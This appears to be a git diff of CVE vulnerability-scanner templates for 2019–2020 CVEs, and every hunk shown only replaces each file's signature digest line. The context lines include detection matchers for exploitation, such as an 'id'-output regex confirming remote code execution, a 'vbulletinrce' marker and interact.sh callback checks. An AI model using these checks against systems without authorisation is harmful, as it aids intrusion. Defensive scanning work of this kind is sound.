b/http/cves/2019/CVE-2019-7481.yaml index 77d1fcb755..45ffb26eca 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -45,4 +45,4 @@ http: part: body words: - "4220397236" -# digest: 4a0a00473045022100fc2de1d32acd1cf03b96cd749569d4dc4cdee7056c2311673a98e7630f4d4d3402203efa55798fc436cf614875c6d85da4cfc4c103e7eecc44f05bf011b81f9e72f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4ddce6dd58e54802f8b7e00fbf984b516fe94d887961627d565a2d5c9540f91022100af1b9cde6236c520689d2a910df99af3210efc81fd5fb4e0e4946f49fbea8500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 7e3a8e2670..c3933c3455 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c70dafcc7d7d6eb9f99c114648e5761414018b4367b7b4c159da330e35926b27022100ef3ede4e5be782d7c4408ed990ff80d46955910d129b0198e629c7a39b933e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220557ca481b084c387fef96e4719dff475473fd01c9c6ea0b6df4e3019198ab8060220290c7769bf61f70e62876e6dedd624b75002cb4639a949f5bbbb4b312ebe24f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index d86d89e9ef..c8ab2f026d 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022030ab1e62a4f1c8caa5e692844444ead196307e42fd3e2e9f0e1eb502875461520220182f107db03695856a6388ac5f209d313dc8deea153c847aa68fd1e921b37bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0db1ffa2818029b469d34fa0c9f7be010217bf3dd336bd2ce2290c7bea9801e022100a182a3b4ba4d91bf66f050a52179a2ef3f3a12a02b4d58692262bb1e32c925ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 65aa34c64b..d4e9de30ad 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf8c8942f083be4875c7bbade9267ac54350324c7bfd1748aed4ad932b2bc2cd022100e3f56f7eb8cbb5403eec108fafa3bbf6565d45761fa7aa7142b70e2145a10f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204402fa80c3d39a5166142c4b70e67d7a090e7eefa656bf0c5856e6ac862334030221009b56863e79158a7b96df999f5c8c0ebb9953967871b5b2523f3bbc19265954a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 9e3dd4def2..5d6c64d8be 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210090b0c9255ed4bd8debc3b78c1174da3d676440ab3b22bbcdb4194d73a494e5af022100e25fd700f360d373bc52a570d4443d67fab5096cdf8954cd830bdc143637a36a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6ead24c87e226c3102f2442282268d9200fece226e32031da9e78be4793303502206618d105fdefaca3c46e2e9e7b467f7c2e5eef4a5d7f8c197a4574613484032f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 295bef09db..622c2a8a12 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol words: - "http" # Confirms the HTTP Interaction -# digest: 4a0a0047304502210099305059d3e414960b21d2db649914b28ad0864ea5e2e7b28b1d541a8be4f23902200c3ec53bfcedc63c02b6ee1ce23f18159b11efede2353180934369730723fd1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038eb424ada0618bb08341844194d65372b8ccd58f5b5d9b6d5335d573806a3d6022071570a163d69451fe0b36d53f55baa4ccb8ae2a1e8982b7dd4d40d24c73c3624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index d0cf1febb9..e6037d73c5 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ef018da3f2c771700041b2cf2bccfd4ed4b27fb1de21aafff551f5d677ac2d96022100e530fc937b9d2e5b939cacee9dc19413956ce91c625046f41c347f7dff85d0af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffed96159f44d69d95da32f7f93c06c6fbf5e48c9f23b1173828ad2b4344f9bf022100f72dc9190a6a0d8685a9775ce37dd8c93c9c803a0132fedfc4fc7aadd95bac7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index a54bbaeff7..ecdce10c7e 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202bd3e935c79e99a34c030db69d63651b0c0e7618f9a9fc1fc6f70d6869e1da0c022100c4c8563486961e29e44646e2b2ac28a7baeb2cc11cdaef1dc72c24e72a376cac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003389c01ebea7c075c0b7026368f397e96618f4b80ee5408c4af93601eaef3c0022100ea01ab3a641fb6cf95022b4bedbb4e5d2ae595b869340a9472e671ca028263c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index 34bce5c76a..692c5db8d1 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -43,4 +43,4 @@ http: - type: word words: - "CDGPermissions" -# digest: 4b0a00483046022100c3a18a3318f70664536a9e7854e0801842104da77cb9d9e51d05151afb9b3a3e02210099ce9dd398cd86776308856981762c06e62b1a25641a9c1916f58095c35cebb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec4949b3b2d4acb6481239e29b0bc11adec43ee83dc158bd36713227e1773414022100ed38f18a585bda6e3e86c8fd11e6c024bb59f285a9b3e3585cd4ee94184d6757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 88368f5241..c076105364 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 503 -# digest: 490a00463044022025be650ff348f8a04fb039a3746a1768515ac939f6037360689dce492053fdc902206d96b09b1aa5587fabab8167454b097b851550076ac5ab327cff954743c0882b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220577e75056a480c5d3d3d5c69e2d114ca9a9206a98e61e22668973e024db5cca7022100f9556b323fad7cfdcb206ead3299cd01878100e9fa148fb4c602c45a59297a9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index b7a2539eb5..0ec7d9d0b9 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -52,4 +52,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100e634c75a09f7ceafc4d3b469f391559c5b37e8dfdde328a5609577f0d822628f022100ad7ca277a5799218d87b35460deb7fb778cbbc0026b0aaea0dd51fced1b9f64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa1828642d09d44a04671f382e1b44fea1e37d5977fe7829c84f1935ff55b28402210096124a6876470d4d02bdeb1fa0cf5c9ad2d69e3f12c139ae5cf7b49b532d1a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 953fcd0241..6519fd0d38 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203e2b213ae4986bcf5370890945bf7db1cd616d1f8ee78dc2868aa1ff55a01add0221008784858b50f4fc92186f526f543c044d936d489e4ac4d49a618c0f6785cb9afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db3479764207f3e756d2cad868bac45ddd95c634fd7be04bd03d1c6108f3f7d3022015aa77b91c8135e6f79c05c5b14815483e0bc5dc96da48504b1d21b15da9e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index ef7f3d4c88..022845090e 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022012ecfbdba8d16719dc7e960231aa3c297036266d058c7c9fc8f3b007480c9530022100a0b95f27a8e7967b747db19aa3a1294d945aac4a3586cad5b3e2527334e4cbcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060e97a053928380819f624b6ff7cba4a6dce350517e3aaf247bf4329648d6d17022100cfd86ef1034a6114cbdc8838be646cbf6612952af655588af72c153e93d1170d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index c097bcee0e..6b617e17f8 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202810d38eca2db75bc4c43b28dc361d626f957f1c98d6afc36e59d6f4593d770102200527e5476b87920b8a1a0af43f7acd34dcae98d267f8ab22739fb9542b4378fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae019dc57fedba7bedf54d951c79ca34b366d4038f6a79934ec6e600d2f9596d0221008b000de0199bd572dc1ddd03452f2f8cd2494f05d50f56a980a0ab9b59d955fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index e362702a83..2a43cbde74 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100fc2394653a151aa954095a50e96616ff9125791e698b84b3033759ba8bb524c0022100ecfec8da6e1940a5d5092d9c4f799557736212bef2724b4b2a3e8bf1721d67cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220444928c31f7688f4f4461954497d908f8f2fbe7235961adf33b39c0ee3c161a302210088d21b151f34b0ef7fbdabeef38d8ff9881ff5f6c05a3d61ece1b872d5b32dbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 1a06464e1a..5223132b67 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206dcdcf2a0fe7f4a7901d37d6e45349ec08cbe1c5e149a69c0f5460f1de76b1e502203b3778862b0ef524d7aa9e6bb24b9f0f6d15754dbae7b51bd037901f919d750a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dea52dfa4843e4127c3a69e69b04f59de83a94b14134d589172366662c011b200221008fd50c26a4daabf85737b644ba836b227c9df3fb1b9d909708ae4f9bf0b9a476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 99dbd41fb3..0698e147f5 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4a0a0047304502204eafdb38f5d2d7cce18d8d570616b23acc1d01cc27f9126ec822a5e3dc8d7918022100ef91bef6dd3c245f03142b9d7c0994538bfe34344bb2af6b27646b0e00ce1687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca9fac9bd8ad0d729072a8a66ef7783126a6988125b5616acfc3d5c4936f4913022100f282c72fb676fa9e7c4fa05198c8c898d037a8e5b3792e2495bd8f96e93dd56b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 1d3a1f9d19..6c9d221992 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -73,4 +73,4 @@ http: regex: - '"url":"([a-z:/0-9A-Z]+)"' part: body -# digest: 4a0a00473045022100e039e6f57b95460653094da4937229e3699661b22dfdd80f841e0fea091a6005022046863ad39e899fd0fbf1008b4344137c0779cbe9a0695cd2c4ef920d3cb53ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204088f9580d9997606ee6a6bd92c3a84a274118a631b94cc1a8b5e9310f58af70022100a04d3c88a9631a5998e6288782037d8afd4e3c83e5c35e0f83e4c3b418cc640d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 963f73091a..c0328d4bf2 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0a3bd8cc0758c70f852f18748f6fcf9a7cb43d3c339f896caedfb9fd1aba0e9022100db5e8d85a482676d76ccf0ed34b34a258cc4021d7c79b75133f8a250f76542d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016d7d3b689f7efaa5a9c96c56239de7586f6f6fdd08dc83d9986626a959cc69c02210089fd182901edcdcf360238d32be7dbc2011e55fe601c08c4ca7f674f740402bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index d183a3abe4..795306ea5e 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fa0cedce737c4a60e3a1f8c125bdf6e0b64e32715758248531af6ade44763703022023e63a805641220d7f1d7508839d384fc5dbb361efc8059271bcffbd8eda6e6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ec1b613324d89f19d4ca4692a2b523f25d073de7a1ef1d288d76e04a148eefd022051fc99e5431ee45f62aed66e653c6254d824e25cbdfacd09f5d00ec5e77f7675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 81af982824..8c21ca2630 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c984b4120b996bbef0cf8716b9ead26900e8d96ec06a86c1f7663b2a33ce8f6022025bd3891452811bcea356711b5fbeb5b777ff4b1ab4b6c1f7d9b001b3fe7663b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203dbba8b8c96246cc949f3aef514859523f43fbaf6b4ee545047df9a559267e2702210094c56d9c22b20bd4fa33e98d22be5facea4fff78dcfb6bb7a7121e2f049c74cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 433afbeae1..1c91dcf1b2 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220520def47cf41d39db9764de4e29118886332fbb7ac7c1e66053e66ba8cecdc4002204011cfb0b12f6f2217dd63b478e1bdfc00e75ab3a38d1b9842180c23de86361a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d6211a8fa14e6ced0b77bff5d84a0121982608f01bedf0a73bd8ac7257d64222022100d7c43fda269e89b960d52b0bc0f49ec66d43eb2f9b21245b92343c114a67fa69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 4b3f7c5341..cb64f7409d 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -79,4 +79,4 @@ http: - '"execution_date":"([0-9-A-Z:+]+)"' internal: true part: body -# digest: 4a0a00473045022100ec5561e5efb8b2c33536dee5f80cd1dc04b2f2f8d911d41f61fb6510cfaa00cc022078d5beb2e8a882b763c26450a112c6198d39f072c8cc97bada8e718b4098c8db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e231040efe507df93cf4a5a908500fec7bf45b479d786637012ccda0555083202202b0bcbeb377d98a6be5840304e25b2d05d2d928a7af0402def0fcd23527a15ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 7ff44c742d..f4364f7d29 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f65493a09dd0f9ea2ea15ecf4b644afff1b36eecbe49962e13e6fdcb0a592290221008af849f7ec11cfeee9b4c0aceb55bd0574f4c22f435106f786807de0a4d6a4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069691e8e255683a2e63c28cab0f8cbe882c5dc1b7dfdb707933805ba1e1dda2d022100ae5532b5a7f45088b67709a1eefea46742b5c1337faca641713cb3713a288557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index ab04c893f2..a76f7e2c83 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022041fc4a93343cc62354b57374ec45f7cd5a84e59af1c642d5fba35345c34a235302203015c1b23e2792b32c79b0b38c69d806398122e34347e933371b36303a90936d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d60c1ad1b1b92b6296b8c5eed86bd648e83612be1c9fbc412c3fc83e1c9ebd202201a69a56bd6f387d3f10102c3bb19f103e6494f3379bfdf930a0c995f74ec5411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 8865dab557..4812b6a57d 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 4b0a00483046022100a5d46e1a75e95843239ba55abc32a04e3e41c77f5ebad433590c4a4f76dbca6b022100c8e26649d9eebb4f0d5e297ea0b0d9275c73433afc8236006fcc7fd45d250b64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c887a191fe2953da451bfd27b6e8864590d0984332de446adaa6fe860a5373030220243f19376a4a1b6b87f399da2a242737f0204a64bc0eeb66e6840e2a0671ef12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 7ccf44fab0..43022bffe4 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_3, "") && contains(body_3, "rConfig - Configuration Management")' - 'contains(content_type_3, "text/html")' condition: and -# digest: 4a0a0047304502203e9084da67e3006f0387cb9636665ca433dd03cdd88a6792b914aced10d7feee022100f0b9a95672eb658a37cc5b7d5cd5585fa45c9e935c96261f9f805e03a2761a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220319251ce99196aa9542616a92b335d92fe9ebb8e1cfc1510bda81df633d7bb100221009c547c64478219cf0f204f49ff70d1585dcaccbf8b14338aa22845f05a1e81d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index daeafc8fac..2eb6faf247 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -55,4 +55,4 @@ http: - type: word words: - "vbulletinrce" -# digest: 4a0a004730450220384e4b7f73e12c09a9104d50eec11bdc5c9561667873cc3e5db56d929a34b1d80221008c6087cb158ea59018cda2a63fa5ccf7106e349817823c85d91af27b2ae8ab95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b427c7a01bf81d156160ecdcbe9e994ac76e3553f6210e7b8bedd9ce1b57c390022100eb2e41676d578b4208db49b258156a8d5f83a939bd98761bd4a5e71bfdeab553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index cf439bfa51..2cc7738032 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f29320d2392721f52b8fc82f127b190c169028bbbcf1719d0e8b6a5b0997f6db02200de0fe74bc47b582d91beddf16f7fbea0a48d9cc52567ead016ae0b9ac1a5ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7b48220ca08733fec2b13608d164c2e93abf97b06b93d172809372c0bd891940220602eb5f02f6b2aada30b7b28ff60a37ac7c0d23fbb5a589f7dddaaa56d6b1803:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index df7142e1a8..96bf411180 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -61,4 +61,4 @@ http: - 'status_code==200' - 'contains(header,"text/html")' condition: and -# digest: 4a0a0047304502203c096626cafed20dbc9030c3e648a3a819e994aca4d10317129168bc8c75ad8a022100f168d1a5fe31a255db5c80e489a4b64ad9398e69df692ea05e41a8a6a063375b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026308c8282f1e465ea7d8a8bbfd2d119d2389072f3a419dc3e3ad81562153d65022100dab8207049e0c64f4ded713c4e139877c7f2dbc72e340315446c0b70d36fcd0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 63019efb04..d86fd50f67 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -100,4 +100,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b3478a3d1c9b33da6b94260e9b8106a998818c2fdb902a9b066d1c7ac809980b022100b3023fdeea2e412f562cf99d872c7461a958b671cd1be9c09e039c7051f3922c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c54eb2f26bb36649628bbe791fc1a04c4a279506c533a1fb0f84742bbe223f02022100bbcb6afa498c1af30f971db41169ac02dafd63707bac9966ce3e8fa755db076d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 0e01c50f26..8d2cf5fd02 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ede93ae3d2d8a4369c76f47926f8a7bfc48d7b70334665a791cc4bb1f71ee4da0220213c5e3ad599f7bf140e15447a3589c31f7791d3afb2ea66c2570100213bb2c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aec7e7c4fcb60c57ef25e6cc1ae2372d27bb9b95b632e0fb4e3c7c0c9feb7766022015ad75e81bbe30e6cf1acedf96073238c86309f593297993c44d0d7f7b49189b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 38d3f8f5cf..e944f3dea6 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ce13b74076da6e41969c97df7180572b27b2059ee09671905e529bea9d0d559602201a6df1809806daf4998b799697f290e982464680a2e487ba3351b922de9a5c44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b058afeb9403194ed58b82d6ceea9a980b8781d2d34c0c361e11a92c61a99ba02207d43ad19b0a0875bf115076262b467efa42c9fd8b94ab5decbb32aec5481ce05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index 8e6a4af6a1..f55c6ce540 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dfcfb03696c918a1d2747fa228cdf2eaa55b60a14ed1fb030a247100d1586849022100f942bcad8c6242916817db978bfc93199bdc8ce554420e795293b554ca8d1364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220297e712cf0aa4f545311067d6a89572158fd49b233d0f073a0ebc3305ac801410221009d6b14a57c310ebdfd16e5bcc82176aff493913a1ea7fd65f3a4fd4c697dc555:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 281b489fdf..9605361185 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -56,4 +56,4 @@ http: - '"dag_id":' - '"items":' condition: and -# digest: 4a0a0047304502210089cb49c5ce487c095f5369f8734137a3c3d88fd03971899ea3555491c97381a202206551832746d04cb3b44e1eb98ca8aca17348cd625b1791071c1dfc9b3f801d86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dec1c56157846ca3044c1a9ca7378bbcbee88d1ac37ecea170f37f39ab2ffb9e02201f451e02bc8f45cdbf35f21bf3057a6486c40992000ab9e934a98b8438c22d11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 381ece6a6c..d68fd09088 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -71,4 +71,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4b0a00483046022100da98ecddbb70a7eb77581e9653fa92b9b159de88c75124492bd32b43a2ea50440221009ebe7190fff83e639145fb240a154245ae8fb4698cae8117916ab2e97469c4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057cc3dae9991d781ea248b25c769d1453bf07dc4e932b89d0d4cc89866fd5232022100e47028445bd336e7e8446d06b6d5e9cf43ab09aa6883799f4d42ddfd609283ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 